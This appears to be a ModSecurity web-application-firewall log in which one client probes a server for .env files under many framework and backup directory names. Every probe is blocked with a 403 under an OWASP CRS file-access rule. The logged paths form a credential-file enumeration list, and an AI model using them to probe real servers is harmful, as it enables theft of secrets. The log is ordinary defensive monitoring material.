[Mon May 11 16:41:51.330342 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamwAAAMg"]
[Mon May 11 16:41:51.330831 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamwAAAMg"]
[Mon May 11 16:41:51.331089 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamwAAAMg"]
[Mon May 11 16:41:51.560699 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanQAAAMg"]
[Mon May 11 16:41:51.561217 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanQAAAMg"]
[Mon May 11 16:41:51.561459 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanQAAAMg"]
[Mon May 11 16:41:51.728185 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHqr1V4kyjgo4bQBUhangAAAMg"]
[Mon May 11 16:41:51.728639 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHqr1V4kyjgo4bQBUhangAAAMg"]
[Mon May 11 16:41:51.728878 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHqr1V4kyjgo4bQBUhangAAAMg"]
[Mon May 11 16:41:51.895882 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanwAAAMg"]
[Mon May 11 16:41:51.896367 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanwAAAMg"]
[Mon May 11 16:41:51.896597 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHqr1V4kyjgo4bQBUhanwAAAMg"]
[Mon May 11 16:41:52.061194 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoAAAAMg"]
[Mon May 11 16:41:52.061693 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoAAAAMg"]
[Mon May 11 16:41:52.061937 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoAAAAMg"]
[Mon May 11 16:41:52.224493 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoQAAAMg"]
[Mon May 11 16:41:52.224970 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoQAAAMg"]
[Mon May 11 16:41:52.225237 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaoQAAAMg"]
[Mon May 11 16:41:52.389412 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaogAAAMg"]
[Mon May 11 16:41:52.389902 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaogAAAMg"]
[Mon May 11 16:41:52.390140 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaogAAAMg"]
[Mon May 11 16:41:52.557540 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHqsFV4kyjgo4bQBUhapAAAAMg"]
[Mon May 11 16:41:52.558067 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHqsFV4kyjgo4bQBUhapAAAAMg"]
[Mon May 11 16:41:52.558351 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHqsFV4kyjgo4bQBUhapAAAAMg"]
[Mon May 11 16:41:52.731770 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaqQAAAMg"]
[Mon May 11 16:41:52.732292 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaqQAAAMg"]
[Mon May 11 16:41:52.732540 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/angular/.env"] [unique_id "agHqsFV4kyjgo4bQBUhaqQAAAMg"]
[Mon May 11 16:41:53.248256 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHqsVV4kyjgo4bQBUhaqwAAAMg"]
[Mon May 11 16:41:53.248815 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHqsVV4kyjgo4bQBUhaqwAAAMg"]
[Mon May 11 16:41:53.249066 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agHqsVV4kyjgo4bQBUhaqwAAAMg"]
[Mon May 11 16:41:53.424856 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHqsVV4kyjgo4bQBUharAAAAMg"]
[Mon May 11 16:41:53.425370 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHqsVV4kyjgo4bQBUharAAAAMg"]
[Mon May 11 16:41:53.425619 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agHqsVV4kyjgo4bQBUharAAAAMg"]
[Mon May 11 16:41:53.666818 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHqsVV4kyjgo4bQBUharQAAAMg"]
[Mon May 11 16:41:53.667315 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHqsVV4kyjgo4bQBUharQAAAMg"]
[Mon May 11 16:41:53.667551 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agHqsVV4kyjgo4bQBUharQAAAMg"]
[Mon May 11 16:41:53.838386 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHqsVV4kyjgo4bQBUhasAAAAMg"]
[Mon May 11 16:41:53.838881 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHqsVV4kyjgo4bQBUhasAAAAMg"]
[Mon May 11 16:41:53.839171 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agHqsVV4kyjgo4bQBUhasAAAAMg"]
